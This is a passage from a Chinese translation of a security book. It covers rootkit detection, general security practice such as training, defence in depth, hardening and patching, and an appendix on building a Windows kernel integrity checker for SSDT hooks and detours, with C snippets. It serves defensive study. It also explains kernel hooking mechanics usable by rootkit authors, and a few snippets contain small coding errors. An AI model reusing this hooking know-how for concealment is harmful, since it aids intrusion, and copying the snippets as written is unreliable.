检测Rootkit是很难的。Rootkit检测工具使用的技术很容易被攻击者击败,攻击者花费了必要的时间确保Rootkit不被这些工具发现。Rootkit检测工具采用的基本技术是有缺陷的,可能被绕开。尽管可以绕开Rootkit检测程序,但是许多Rootkit作者甚至不试图防止Rootkit检测,因为大部分用户甚至没有去寻找Rootkit。而且,因为许多Rootkit操作于比用户更高的级别,对文件系统或者注册表的粗略察看可能建立没有安装Rootkit的假象,所以用户没有必要运行Rootkit检测工具。 基于硬件的Rootkit检测展现出了一些前景,但是还不完美并且需要额外的代价。尽管美国政府投资的公司开发了这样的系统,但是目前还不存在商业化的基于硬件rootkir检测技术。 最后,大部分基于软件的Rootkit检测工具都是免费的,但是需要高级的技巧来正确分析产生的数据。许多Rootkit检测工具使用的技术被组合到商业产品中,这些产品可以订购并且在整个企业中部署。因为没有一个工具能够找到所有类型的Rootkit,所以建议使用多种Rootkit检测和删除工具,运行多个工具确保Rootkit从系统上正确地删除。 第11章 常规安全实践 我们已经介绍了恶意软件和Rootkit的各种功能和相关的保护技术,接下来将讨论安全实践。这些实践围绕简单的公司策略,例如用户教育、培训安全意识计划、修补和更新策略以及/或者简单地执行行业认可的安全标准。在本章中,你将学习更多的简单策略,在其实施后能够改进你的整体安全态势并且降低恶意软件感染风险。 11.1 最终用户教育 任何安全计划中的一个重要部分是最终用户教育。用户需要知道警惕什么或者他们可能成为什么威胁的受害者。要确保网络用户意识到可能发生的事情,使他们能够更仔细地观察和理解出现差错时会发生什么。对于安全来说,最终用户是你的第一道和最后一道防线。没有任何工具、企业套件以及/或者网络设备能够使你免遭用户错误的侵害。 把避开互联网骗局的责任放到没有意识到威胁的用户肩上是很困难的。计算机用户受困于大量的安全问题,如蠕虫、仿冒邮件、恶意网站以及许多恶意软件,他们无法抵御所有侵害是意义深远的事实。你总是会看到安全专家谈到用户的愚蠢,建议公司更好地教育他们关于正确的安全预防措施的知识,但是计算机安全太复杂,想让普通用户能够在进行自己的工作的同时跟上每种潜在威胁是不现实的。是的,你可以告诉一个人不要打开来自陌生人的邮件附件,然后会怎么样?攻击者开始发送似乎来自老板、工作伙伴以及用户的配偶或者最好的朋友的邮件。在现代的办公室里,你无法不单击附件。 全世界的可用性研究已经发现人们很不情愿给出自己的电子邮件地址,即使对于不会发送垃圾邮件的真正的电子商务网站也是如此,使得向客户发送有用的信息和确认信息都更加困难。持续地让用户对每种可能的攻击感到惊恐是不合理的,但是,他们确实应该知道会发生什么。 安全意识培训计划 培训计划对于任何公司都是很重要的,可以告诉用户公司策略、工作站设置、网络驱动数据结构以及任何你希望培训用户的网络安全及/或常规计算机使用信息。许多组织要求所有工作人员在加入组织时进行正式的安全意识培训,并在之后定期进行培训(一般是每年一次)。安全意识培训计划的一些常见主题包括: ·策略 在你的安全意识培训中介绍组织的策略和程序,提醒用户重要的策略。 ·密码 讨论公司的密码策略——确保每个人对实际策略的各个部分都有清晰的理解,例如密码长度要求、密码期限和密码安全(例如,不要把密码写在即时贴上)。确保每个用户都知道这个策略归根到底是任何公司最重要的策略。 ·病毒 包括病毒爆发时应该遵循的程序,以及用户为了避免感染所应该警惕的事项。 ·电子邮件 强调电子邮件,使用户理解这是许多恶意软件进入网络的方向。用户应该知道组织的电子邮件使用和滥用的策略。 ·互联网使用 确保用户理解访问互联网是特权而不是权利。用户必须理解使用互联网时“该做和不该做的”,以及应该知道和避免的事项。 ·计算机盗窃 指导用户保护他们的便携电子设备,帮助你更好地保护公司数据。还有,让用户知道你实施的用于更好地保护公司数据的安全功能和设备。 ·社会工程 确保用户理解如何验证某些人的身份以及应该共享和不应该共享的组织信息。人们乐于提供信息的倾向是给组织带来毁灭性灾难的最大成因。 ·建筑物出入 解释组织的物理安全配置。 ·管理的考虑 教育用户有关适用于他们的职位以及/或者组织的规则。 安全意识计划不仅需要指出上述这些问题,还要让员工感到自己是解决方案而不是问题的一部分。你可以用许多不同的方法来达到这一目标,包括竞赛、提问、公共区域的海报以及自备午餐的学习课程。通过反复人们可以更好地学习,所以建议进行定期的意识培训。如果可能,将安全意识作为员工例行工作的一部分以确保成功。许多公开网站提供可以下载的安全意识计划素材,例如Microsoft TechNet(http://technet.microsoft.com/en-us/security/cc165442.aspx)具有足以启动计划的素材。 家庭用户的恶意软件预防 ·当心要求软件安装的网页。 ·不要安装来自浏览器的新软件,除非你完全理解、信任网页以及软件提供商。 ·在安装前使用更新过的防病毒和防间谍软件扫描每个通过互联网下载的项目和程序。 ·当心意外的陌生邮件,不管发送者是谁。 ·不要打开附件或者单击电子邮件中包含的链接。 ·始终启用操作系统的自动更新功能,并且尽快应用新的更新。 ·始终使用防病毒实时扫描服务。 管理员的恶意软件预防 ·部署HTTP扫描和内容管理系统。 ·不允许不需要的协议进入公司网络。 ·在网络上部署漏洞扫描软件并经常进行审计。 ·限制所有网络用户的特权。 ·部署企业防间谍扫描。 ·支持用户意识训练。 黑客预防方法 黑客总是寻求进入其他人的计算机的途径。攻击者可以在受害者不知情的时候从任何地方进入系统。不幸的是,永远都没有一劳永逸的黑客预防方法。不管你投入多少金钱或者资源来设计完美的网络,仍然会有人找到占有它的途径。像NSA、CIA和NASA这样的政府机构都已经成为了黑客的受害者。民间部门(如Citigroup、Ross和Wal-Mart等公司)也发生过同样的事情。你能做的最好的事情就是保持警惕,并且采用纵深防御策略来确保你的网络资产安全并受到最好的保护。 11.2 纵深防御 纵深防御(defensein depth)是军事策略的一个组成部分,也称为弹性防御(elastic defense)或者深度防御(deep defense)。从本书的目的出发,我们将坚持采用纵深防御在技术方面的意义。纵深防御的目的是减慢攻击者前进的步伐而不是阻止攻击者前进,为防御者赢得时间。纵深防御在当今技术界里是达到安全的实用方法,包括了智能工具、技术和程序的应用。纵深防御学说是保护能力、成本、操作和性能之间的一个平衡。下面是纵深防御层次的图解。 使用多个如下层次构成纵深防御策略: ·物理安全(也就是呆锁) ·验证和密码安全 ·防病毒软件 ·防恶意软件/Rootkit软件 ·资产管理软件 ·基于主机的防火墙(软件) ·基于网络的防火墙(硬件或者软件) ·停火区(Demilitarized Zones,DMZ) ·入侵预防系统(IPS) ·入侵检测系统(IDS) ·封包过滤器 ·路由器和交换机 ·代理服务器 ·虚拟专用网(VPN) ·日志和审计 ·寿命统计 ·定时访问控制 ·不能公开访问的软件/硬件 11.3 系统加固 大部分计算机提供限制系统访问的网络安全功能。防病毒程序和间谍软件拦截程序之类的程序阻止恶意软件在机器上运行。但是,即使采用了这些安全措施,计算机对于外部访问仍然是有漏洞的。系统加固(system hardening)又称为操作系统加固,用于最小化安全漏洞并且消除系统风险。系统加固的目的是消除尽可能多的安全风险,一般通过删除计算机上所有不必要的软件程序和实用程序以及关闭所有不必要的活动服务来完成。国家安全局(NSA)有许多系统加固指南,可以在http://www.nsa.gov/SNAC/上找到。 系统加固可能包括重新格式化硬盘并且只安装计算机工作的基本需求。CD驱动器作为最后一个启动设备,这使计算机在需要时可以从CD或者DVD启动。如果不是必需,关闭文件共享和打印共享,TCP/IP协议往往是唯一安装的协议。禁用来宾(客户)账户,修改管理员账户名,为每个用户创建安全的密码。启用审计来监控未授权访问企图。 11.4 自动更新 每种操作系统和应用程序都有某种方式的自动更新。这个服务用于确保系统修补到最优的水平。一般来说这个过程是自动的(正如它的名称)并且在后台运行,不需要用户安装更新,除非他提示系统提供可用更新的通知。某些应用程序将通知用户有新的可用补丁,并且提供现在安装或者稍后安装的按钮。自动更新应该始终开启,并且始终允许连接到更新服务器以保证系统最新。 在每天都有攻击的时刻,确保你的企业在任何时候都处于更新状态是很有意义的。幸运的是,两个主要的OS供应商——Microsoft和Apple以及大部分Linux分发商都提供下载更新的方法,Microsoft甚至自动安装最关键的更新。Microsoft提供Windows更新服务已经多年,它的最新版本Microsoft Update做得更好,因为它还为许多非OS应用程序(包括Microsoft Office)下载和安装更新。Microsoft的自动更新服务可能是该公司对于个人的最佳安全补丁工具。正确地设置这个服务,可以配置系统自动下载甚至安装任何关键安全补丁。 Microsoft的下载在过去有过少数问题,但是最后,比起攻击者获得你的网络的远程访问权来说,重新安装这些偶尔有问题的补丁总还是要好一些。Apple的MacOS提供软件更新服务,这个服务在补丁可用时启动,不能自动下载补丁,但是至少会在更新可用时警告你。 各种Linux分发版本以不同的方式(但是大体上都可以自定义)处理软件更新,和你的OS供应商或者社区联系获得相关信息。流行的Ubuntu分发版本带有一个工作方式很像Apple的软件更新的小脚本:当安全修复和其他更新可用时,屏幕右上角出现一个黄色气球窗口,告诉你哪些更新和修复可用。 11.5 虚拟化 在过去数年,信息技术(IT)已经在深度和广度上都有了发展,超过了第一代计算机专家原来的概念。现在我们的环境面临着全球性的威胁,这种威胁常被称为全球变暖。所有组织用于确保排放量最小的最佳解决方案之一是使用虚拟化技术。绿色政府这一术语在过去一年已经成为流行语,它定义了一个历史性的政府会推动IT行业朝着更加清洁、环境友好和高效的方向来运营业务。虚拟化是一个虚拟机(VM)映射的软件实例,虚拟机映像在称为虚拟机管理程序(VMM)的管理应用中运行。 使用虚拟化环境的重要性是,能够比非虚拟环境更好地管理系统。例如,一个具有大量资源(CPU、RAM、硬盘)的4U机架式服务器能够容纳包含一个域名控制器、邮件、防病毒、网络IDS甚至数据库(以及/或者CRM系统)的服务器场。考虑一下,从一台强有力的机器上运行所有这些系统来代替多台花费空调和电费的机器的长期利益。虚拟化很容易管理并且更低廉,在一个每种费用都在猛涨(我们不知道这种涨势何时能停止)的时代是很关键的。 在你的本地文件浏览器中,每个单独的服务器仅仅是一个映像而不是实际的服务器。但是,一旦在一个VMM应用程序中启动,这些服务器就会运行,让人感觉像真正的服务器场。这种实现的好处是能够跨越整个企业。使用虚拟化的环境,你能简单地用一个系统管理服务器、工作站和各种企业级应用程序。灾难恢复、操作、维护和安全过程所花费的时间都得以减少。虚拟化既有商业化的也有开源的平台,所以根据你的预算和IT人员的技能,可以计划和执行VM解决方案的无缝实现。 我们有幸为私人企业和联邦政府部门实施了商业化和开源的VM解决方案。我们已经看到了虚拟服务器场、虚拟网络甚至与恶意软件斗争的虚拟化的成功实施。这些工作机会使我们相信更有效的绿色政府虚拟化解决方案在现在和将来能够承担更重要的角色。 11.6 固有的安全(从一开始) 固有的(baked-in):形容词,意指内建(进程、系统、交易、交融交换等)。 我们都知道“固有”这个词的含义。那么有人真正实践过固有的安全吗?幸亏答案是肯定的,但是还有些人相信国土安全部前网络运作领导人所说的“网络安全是一个白手起家的行业,不能够信任”(这句话可以解释他不再工作于那个部门或者安全领域的原因)。令人伤心的是,他运作该部门的生产网络,却在2003年至2006年间不允许安全团队实现各种确实开展工作和保护网络的技术。对他的团队来说,安全是事后考虑的事情,他们始终觉得安全妨碍了操作,从来没有用正确的方式成功地实施过任何技术。 所以请记住,最安全的做法是从一开始就建立固有的安全。但是,在需要时可以完成安全分层,即使这不是原始设计的一部分。基本的规则是:始终扩展和加强你的纵深防御层次。 11.7 小结 你可以做很多确保网络尽可能安全的工作。但是,攻击者到处都是,而且有些领先于你和你的团队。所以要始终保持警惕,尊重你的对手;有些对手已经瞄准了你并且取得了成功,而你甚至还不知情。在这些方面进行更多的研究,收集更多的信息,你将会发现有许多好的信息。对任何团队来说,遵循行业的最佳实践都是很好的出发点。最后,要知道你的网络对攻击者的价值以及他们用于渗透到你的网络中的可能途径。孙子说得好:“知己知彼,百战不殆。” 本书由“ePUBw.COM”整理,ePUBw.COM 提供最新最全的优质电子书下载!!! 附录A 系统安全分析:建立你自己的Rootkit检测程序 在这个附录中,我们将更详细地介绍如何将第10章中讨论的一些主要防Rootkit技术转换为系统完整性验证工具。系统完整性的概念已经出现了一段时间,但是有段时间这一话题无人问津。我们希望告诉读者完整性分析的重要性并且恢复这方面的讨论。 为了教育的目的,本附录将从一些检测基本的Rootkit技术的代码开始。这些代码将出现在从本书的网站http://www.malwarehackingexposed.com可以免费下载并且根据你的目的定制的一个开源检测工具中。正如第10章中所详细介绍的,能进行Rootkti检测和删除的免费工具很多,其深度和功能以及操作系统支持各有不同。你需要对这些工具是否符合需求以及是否需要定制的解决方案做出一个客观的评价。 我们将要为你展示的代码检查Windows操作系统中一些关键区域,这些区域表现系统曾被侵害。我们将这些感染点称为完整性侵害指标(Integrity Violation Indicator),或者IVIs。我们将发现4个这样的IVIs,本书中还讨论了许多其他的指标,例如: ·SSDT钩子 ·IRP钩子 ·IAT钩子 ·DKOM 为了检测这些区域中的系统完整性侵害,我们将说明3种检测技术,这些技术也可以扩展到本书提及的其他IVI: ·指针验证(SSDT、IRP和IAT) ·函数detour/修补检测(SSDT、IRP和IAT) ·DKOM检测(DKOM) 使用这3种技术分析系统中的IVI是对操作系统完整性进行基准测试的一个简单方法。对于每个分析区域或者IVI,我们将关注系统完整性的重要性和使用代码样本检测指标存在的方法。这种基本方法可以作为构建和定制你自己的Rootkit检测程序的出发点。 我们在第3章和第4章中讨论用户模式和内核模式Rootkit,以及第10章中介绍防Rootkit技术时接触过这一主题。在本附录中,我们希望将这个主题扩展为一种强大的可扩展并且用户友好的系统完整性分析方法。 在我们的警告之后,将以对系统完整性分析的简介和这一领域中进行的相似工作的历史来为本附录提供一些背景。然后我们将进入IVI和检测它们的源代码。 警告 在开始之前,提出一些警告是合理的。本附录中展示的代码使用实时分析技术检查关键的操作系统部件。本书中已经讨论过,这些部件的实时分析存在许多问题,例如恶意程序的存在可能干扰分析。Rootkit检测程序和Rootkit本身在实时分析期间常常互相干扰并且可能使系统崩溃。因为这样的工具影响系统稳定性,我们建议不要在生产环境或者关键系统上使用这类的代码。 每个IVI中讨论的代码将以Windows内核驱动程序的形式实现。从本附录的目的出发,我们将不过多介绍开发Windows驱动程序的难点。我们强烈建议读者在开发驱动程序之前查阅Windows驱动程序开发包文档。 本附录提供的代码是按原样提供的,不保证或者暗示能够在实际使用中稳定工作。在某些情况下,我们必须删除有价值的查错代码使附录保持合理的长度。偶尔会使用未写入文档的函数,以及一些不安全的内存和字符串函数。风险自担! 注意:本章中的源代码和网站上对应的代码在GNU Public License version 3(GPLv3)下发行,这一许可的一个副本可从http://www.gnu.org/licenses/gpl-3.0.html上获得,也包含在网站上的源代码中。 A.1 什么是系统完整性分析 完整性(integrity)一词在计算机安全领域中有很多含义,它的定义很大程度上取决于你所询问的人以及背景。完整性的概念最经常与数据完整性相关,如使用MD5文件hash验证文件内容在传输中没有变化。例如,取证调查人员总是通过比较相关的MD5 hash来验证驱动器映像与原始映像。验证数据或者文件完整性的主要目标是确保其正确性和所有使用模式(传输、处理和存储)下的一致性。 系统完整性分析的目标也相同,但是范围更广。它的目标不是验证一个文件的状态,而是验证整个计算机系统的状态。全部系统的完整性分析涉及许多主题,包括物理访问、信息保护、访问控制、验证、授权甚至硬件兼容性问题。所有这些领域都表现出了确保系统稳定和可用的难度。 操作系统完整性分析(本附录所关注的)是系统完整性分析的一个子集,关注点在于验证操作系统及其组件的正确性和一致性。记住,所有更广泛的系统完整性分析考虑仍然影响着操作系统完整性。例如,如果硬件击键记录程序实际上是嵌入安装的,就能够在击键发送到操作系统之前在固件级捕捉它们。操作系统的分析可能表现高级别的信任,但是计算机系统本身仍然在较低的级别上受到侵害。 为了给完整性这个词语一个不同的解释,我们假设特定计算机系统的完整性是你对其信任程度的同义词。这种信任的重要性在你考虑每天的计算机化生活中的每个领域时有了新的意义:你信任汽车中的计算机系统能够在寒冷的日子里启动引擎,医院里的医疗设备能够正确地计算伤者的吗啡注射包的滴注速度,飞机的导航系统能够保证你安全着陆,电子投票系统能够正确计算总统选举的结果。现在,如果你知道很有可能一个Rootkit已经安装在这些系统上,而这些设备在有很多免费的检测技术存在的情况下对这些Rootkit不作任何检测或者阻止,那么你对这些系统的信任程度会如何?你仍然会登机吗?如果你的答案是“不”,那么你怎么能接受声称保护你的个人信息以及你的孩子的互联网访问的安全软件有同样的疏忽呢?如果你的回答是“是”,那么可能只有“数码9/11”能让你明白——也许这个附录也能做这项工作! 本质而言,恶意软件和Rootkit会危害操作系统完整性从而危害整个系统。系统可能再也得不到信任,任何从操作系统中读取的信息必须看做是不可靠的。这就是使用与操作系统运行于同一级别的系统完整性验证工具的重要性。这样的工具(如本章中介绍的一个工具)能够对操作系统最关键的组件(我们定义为完整性侵害指标)进行客观的健康检查。在一个重复性的和可再现的过程中使用这样的评估,经常性地重新评估系统的完整性,特别是对暴露给公众的系统,同样是很重要的。 为了体会系统完整性分析的重要性,考虑如下情况:据我们所知,现在的市场上没有一种数字取证产品在收集数字证据之前试图验证系统完整性。这意味着人们正在因为可能受到污染的证据而受到指控——这些证据没有用最挑剔的方式进行收集。当然,完整性验证工具也可能受骗,但是关键是这些主要的商业化产品至少应该进行一些基本的检查。这一问题并不只存在于取证产品:防病毒、HIPS/HIDS、个人防火墙以及许多其他工具都没有在安装之前试图验证操作系统的状态。 这不是一个新的关注点;这个问题多年前就已经指出,但是不知为什么没有音讯,这个问题已经被遗忘。我们希望在本附录中再次提出这个问题。 系统完整性分析简史 尽管这个领域已经完成了许多工作,但是定义完整性分析模型的唯一一次正式的尝试是Joanna Rutkowska和安全与开放方法学院(ISECOM)于2006年进行的。在他们的《入侵检测的开放式方法》(OMCD)文档(http://www.isecom.org/projects/omcd.shtml)中,作者列举了确定OS是否已经受到侵害所应该验证的各种操作系统区域和组件。但是,该文档仅有6页,仅仅包括了这种方法学的概要。之后似乎没有其他的内容得以公布! 其他著名的Rootkit作者和研究人员,像Jamie Butler、Peter Silberman、Sherri Sparks以及Greg Hoglund已经在主机完整性领域发布了大量的作品,最著名的是VICE和RAIDE(由Butler/Silberman开发);但是,这些项目/工具仅仅部分实现,并且已经被放弃。 A.2 完整性分析中的两个“P” 几乎所有本附录以及大部分的系统完整性分析中的检测方法都需要应用两个基本法则,这两个法则与本附录开头列出的3种检测技术中的两种对应: ·指针验证(point Validation) Windows操作系统大部分用C语言编写,为了速度大量使用了指针。结果是,许多我们进行完整性分析所需的数据结构是基于指针的(列表、表格和字符串)。典型的操作是遍历函数指针的一个表格(例如,在检测SSDT和IRP钩子时)并且确保这些指针指向“可信任”系统模块中的一个位置。 ·修补检测(patch detection) 有时候指针验证可能因为代码修补而失败。例子包括detour和嵌入函数钩子。在前者的情况下,函数序言被覆盖;在后者的情况下,函数主体的一部分被覆盖。通过动态地反汇编函数中的代码块,检测工具有时能够很容易地识别出修补。在大部分情况下,当函数中发现一个修补,就揭露了使用一个跳转指令将执行转到内存中的另一个恶意模块的行为,这涉及指针操作。这时,适用规则1中的指针原则。通常,一个给定的数据结构的正常完整性验证需要应用两个P,即指针(pointer)和修补(patch)。SSDT是一个例子。现在的大部分检测工具只是遍历指针表并且确定这些指针指向Windows内核中的一个位置。这些工具遗漏了下一步——第二个P,修补检测。每个代表系统服务功能的SSDT项目都可能被修补。因此,在验证指针之后,该工具还应该检查每个函数的修补情况。 表A-1摘要介绍了本附录中的完整性分析的两个P背景下出现的检测技术。 在本附录的余下部分,我们将通过介绍SSDT的一个例子解释这两个P——指针验证和修补验证。我们还将提供装入的驱动程序中的IRP钩子检测的一个实例,阐述如何组合这两种技术,并且简单地介绍相同的技术在IAT钩子检测中的应用。最后,我们将阐述检测DKOM的一种技术。 A.2.1 指针验证:检测SSDT钩子 系统服务调度表(SSDT)是Windows内核ntoskrnl.exe(对于启用物理地址扩展的系统是ntkrnlpa.exe)输出的一个数据结构。在第4章中已经讨论过,Windows利用这个结构允许用户模式应用程序访问系统资源和功能。例如,当用户模式程序需要打开一个文件时,它调用来自各种Windows支持的程序库(kernel32.dll、advapi32.dll等)的win32 API函数,依次调用ntdll.dll输出的系统函数(最终到达内核中的一个实际函数)。每当需要系统服务时就执行内核函数KiSystemService(),这个函数在SSDT中查找请求的系统服务函数然后调用该函数。 这个映射定义于SSDT结构中,这实际上是实现系统调用接口的多个表格的统称。第一个这种表格是获得SSDT副本的出发点,内核输出的名称为KeServiceDescriptorTable。这个结构有4个字段,包含指向4个系统服务表格的指针,在内部以名为KiServiceTable的未输出结构被引用。一般来说,KeServiceDescriptorTable中的第一个项目间接包含了指向ntoskrnl.exe的服务表的一个指针。第二个项目指向win32k.sys(GUI子系统)的SSDT。第三个和第四个项目未使用。图A-1说明了这些结构之间的关系。 图 A-1 服务调度中涉及的各个结构 图A-1列出了如何得到Windows内核使用的“真正”SSDT结构的3个步骤。第三步中展示的结构KiServiceTable是SSDT钩子主题中大部分资料所提到的结构。 注意:系统维护SSDT的第二个副本。这个第二副本被称作KeServiceDescriptorTableShadow。关于这个结构的更多信息,参考Alexandar Volynkin的网站——http://www.volynkin.com/sdts.htm。 检测SSDT钩子的最简单方法包括如下3步: ·获得当前“真实”的全局SSDT表。 ·查找内存中内核的基地址及其模块大小。 ·检查表格中的每个项目并且确定服务函数的地址是否指向内核的地址空间;如果地址落在内核范围内,该项目就很可能是合法的。如果项目落在内核之外,那么该函数被挂钩。唉,这个过程恰恰没有看上去那么容易。 注意:这里,我们打算检查全局服务表。Windows中的每个线程获得这个全局表的一个局部副本,这也能够单独挂钩,本附录不介绍如何在这种情况下检测SSDT钩子。 SSDT检测代码 在接下来的小节中,我们将讨论实现前述的3个步骤的检测代码。 获得SSDT的一个副本为了编程获得表格信息,首先我们必须定位数据结构。因为我们可以使用许多写入文档的方法来达到这个目标,所以将使用最简单的方法:内核将该表作为符号KeServiceDescriptorTable输出,这种方法只是动态地链接到这个符号,将该模块导入到程序中。当然,这么做很显眼,所有监控这个结构的Rootkit都会注意到你的行动。C语言代码很简单: __declspec(dllimport)_KeServiceDescriptorTable KeServiceDescriptorTable; 因此,在运行时,变量KeServiceDescriptorTable将会装入并且可以由我们的代码访问。_KeServiceDescriptorTable类型是程序头文件中定义的一个自定义结构。这个结构中的字段对应本小节开始讨论的4个系统表(ntoskrnl.exe、win32k.sys和两个未用的表),每个表格中的第一个项目引用包含指向真正SSDT指针的一个描述符表。实现这个配置的数据结构如下: typedef struct__DescriptorEntry { void**KiServiceTable;//Base address of the SSDT unsigned long ServiceCounterTableBase;//counter base addr unsigned long NumberOfServices;//Number of services unsigned char*ServiceParameterTableBase;//Base address of param table }DescriptorEntry,*pDescriptorEntry; //SSDT table structure typedef struct__KeServiceDescriptorTable { DescriptorEntry ntoskrnl;//Entry for ntoskrnl.exe DescriptorEntry win32k;//Entry for win32k.sys DescriptorEntry unused1;//Unused DescriptorEntry unused2;//Unused }_KeServiceDescriptorTable,*p_KeServiceDescriptorTable; 注意:在继续之前,确定你扎实地掌握了这两个结构之间的关系,以及它们是如何与图A-1中说明的概念对应的。 现在我们在这个结构中存储了SSDT,只要循环读取这个结构并打印表格就行: void PrintSSDT(_KeServiceDescriptorTable Table) { int i=0; void*AddrOfSystemServiceFunction; char parameterValue; void**pKiServiceTable=Table.ntoskrnl.KiServiceTable; char*pServiceParameterTableBase=Table.ntoskrnl.ServiceParameterTableBase; DbgPrint("PrintSSDT():[1]SSDT table dump:\n\n"); DbgPrint("——\n"); for(i=0;i<(int)Table.ntoskrnl.NumberOfServices;i++) { AddrOfSystemServiceFunction=pKiServiceTable[i]; parameterValue=pServiceParameterTableBase[i]; DbgPrint("Index%d:\tHandlerAddr:0x%08p,\tParameterNum:%d\n", i,AddrOfSystemServiceFunction,parameterValue); } DbgPrint("——\n\n"); } 黑客90210在Rootkit.com上的一个帖子(http://www.Rootkit.com/newsread.php?newsid=176)中指出,这种方法在SSDT被重定位(也就是没有位于基表的索引0中的地址)时可能不可靠。具有讽刺意味的是,帖子的作者指出Kaspersky防病毒软件就是重定位SSDT以欺骗某些Rootkit的一个例子。黑客90210提出寻找服务表真实位置最佳的方法是解析内核的二进制文件(ntoskrnl.exe),找出所有重定位引用,确定这些重定位是否引用系统服务表。如果找到引用服务表地址的重定位,程序解析该汇编指令以查找指出表格被移到一个立即地址的操作码。如果操作码匹配,那么这条指令重定位该表,程序复制重定位的立即地址(RVA)。接着程序转储该地址上的SSDT。 获得KeServiceDescriptorTable地址的另一个简单方法是调用Windows API函数GetProcAddress()。这个函数读取给定模块中输出符号的内存地址。其他的替代方案如SDTRestore所用的(http://www.security.org.sg/code/sdtrestore.html),包括人工检查ntoskrnl.exe二进制文件的输出表查找其中的结构偏移量。该偏移量之后被加到ntoskrnl.exe的装入基地址,这是独立于服务包的结构查找方法。应该注意,这种技术在已自定义用户空间内存储存启动(例如,在启动Windows时使用/3G开关)的系统上会失败,因为这种技术假定内存空间从0x80000000开始。 寻找内核基地址内存中装入的任意模块的基地址都可以使用许多系统A P I(如LoadLibrary())读取。(过去)臭名昭著的未写入文档函数ZwQuerySystemInformation()适于这个目的。这种简单的技术是: ·获得装入模块的列表。 ·循环读取模块列表查找“ntoskrnl.exe”。 ·返回ntoskrnl.exe的基地址和大小。 ZwQuerySystemInformation()接受许多信息类结构来读取各类数据(进程列表、装入模块列表等)。我们将向这个函数传递一个名为SystemModuleInformation的类型,定义如下: typedef struct_SYSTEM_MODULE_INFORMATION { DWORD reserved1; DWORD reserved2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; }SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION; 为了得到ntoskrnl.exe的属性,我们将用相关的参数调用API: nt=ZwQuerySystemInformation(SystemModuleInformation, pModuleList, bufsize, returnLength); 然后,我们将在模块列表中循环查找ntoskrnl.exe,记录基地址和大小: for(i=0;i<(long)pModuleList->ModuleCount;i++) { //[error exception handling code here] //compare module name If(strcmp(pModuleList->ImageName,findName)) { modstart=(ULONG)pModuleList->Modules[i].Base; modend=modstart+pModuleList->Modules[i].Size; //return this information } …… 检查每个SSDT项目的钩子现在我们有了SSDT信息,并且知道了SSDT中服务函数地址所应该指向的(ntoskrnl.exe的范围),遍历表格比较每个函数地址就是件简单的事情了。只要简单地修改PrintSSDT()函数来比较每个项目和notskrnl.exe范围: If(KiServiceTable[i]<ntoskrnlStartAddress|| KiServiceTable[i]>ntoskrnlEndAddress) { //This SSDT entry is hooked! } 下一步应该是恢复原始的SSDT项目(从磁盘装入ntoskrnl.exe二进制代码并且查找这个项目的正确地址)或者选择性地对挂钩这个函数的模块进行一些分析,这些模块可能是一个软件防火墙或者防病毒产品。粗略的分析能够消除假阳性。 需要考虑的一个问题是假阴性;因为SSDT中特定的服务函数地址有效(也就是在内核范围内)并不意味着服务函数本身没有被污染。该函数本身可能被典型的函数detour/修补所侵害。和SSDT钩子达到相同目标的隐身替代品是修补实现SSDT指向的函数的实际模块代码,而不是挂钩SSDT中的指针。这种方法越来越流行,2007年的W32/Almanahe Rootkit就是证据(McAfee的Avert Labs博客,http://www.avertlabs.com/research/blog/index.php/2007/05/04/a-new-rootkid-on-the-block/)。 现在我们更深入地观察一下detour。 A.2.2 SSDT中的修补/detour检测 第4章中讨论过,函数detours(也就是修补)广泛地用在Windows中,最有名的是Windows更新服务中的热修复。实际上,Microsoft发行了一个开源工具Detours,帮助开发人员在自己的产品中因为各种目的实施函数detours(http://research.microsoft.com/en-us/projects/detours/)。这个产品目前仍由Microsoft研究所提供维护。 函数detours在设计上极其简单。detour针对一个函数,修补并且覆盖函数序言为跳转到detour本身的函数。这时,detour可以进行预处理工作,例如修改用于原始函数的参数。detour的函数接着调用所谓的蹦床函数,这个函数调用原始的函数(传递所有修改过的参数)。然后,原始的函数按照设计工作,并且返回到修补过的函数,由该函数进行一些后期处理工作,如修改原始函数的结果,为了文件的隐藏,可以是删除某些项目。 出于我们自己的目的,我们对寻找蹦床函数不感兴趣;我们所感兴趣的是找到原始的detour,它一般覆盖函数序言的前5个字节(足以放下一个短跳转指令和操作数)。我们将扫描25个字节寻找这样的覆盖。 用于检测这些序言修补的方法与SSDT钩子检测方法类似,但是我们不遍历函数地址表确定地址落在内核范围,而是检查给定函数的头几条指令没有跳转或者调用另一个模块。但是,在我们讨论检测步骤和代码之前,先深入地看看影响我们的检测逻辑的x86体系结构的基础知识。 注意:这种检测技术没有包含嵌入函数钩子的检测,嵌入函数钩子覆盖函数体而不是函数序言。 理解跳转和调用 为了理解解析x86指令的复杂性和其在detour检测中的应用,我们来看看如何人工分析x86指令操作码和操作数以检测detour。在实际的代码中,我们将使用一个开放源码反汇编程序来进行现在研究的这些艰苦的工作。 在读取我们希望测试的函数的头几个字节时,我们必须能够翻译原始的字节。原始的字节对应于指令和数据,两者以不同的方式处理。对于指令,因为我们打算寻找分支指令(也就是跳转指令JMP和调用指令CALL的变种),所以要考虑的操作码集有限。我们可以在x86手册中寻找各种JMP/CALL指令,将其硬编码到检测例程中(网上的手册快速参考请到http://home.comcast.net/~fbui/intel.html查看)。 这里,我们实际上实现了自己的基本反汇编程序。我们还需要知道指令的大小(JMP是1个字节),这样可以在读取字节时参考这个基本的查找表格。接着,确定指令是不是JMP/CALL就是很容易的事情了。我们可以采用更健壮的反汇编程序,如Z0mbie的ADE32(http://z0mbie.host.sk/),这个程序包含在许多病毒中,但是对我们的用途来说没有必要。 对于指令操作数/数据,我们的目标是将其转换为正确的内存地址,这样可以确定JMP/CALL分支执行的位置。如果操作数引用函数二进制模块之外的内存地址,就很可能是一个detour。为了处理操作数/数据,我们必须考虑所有x86调用类型和指令参数可能采用的寻址模式。有4种调用类型,但是我们只考虑近调用和远调用。近调用发生在内存中的相同的代码段内(在代码段CS寄存器中指定),使用相对寻址(地址是一个当前指令地址的偏移量)。因此,近调用指令以如下形式出现: ·rel16/rel32 16位或者32位相对地址(例如,JMP 0xABCD)。 ·rm16/rm32 16位或者32位寄存器或者内存地址(例如JMP EAX、JMP[EAX]或者JMP 0x12345678)。 远调用分支进入内存中完全不同的代码段,因此处理器对执行转移进行仲裁(因为它运行于保护模式)。处理器查询指定段选择符的GDT或者LDT,确定选择符的类型、访问特权、代码特权级和其他属性。远程调用形式为[段]:[偏移]指针: ·ptr16:16 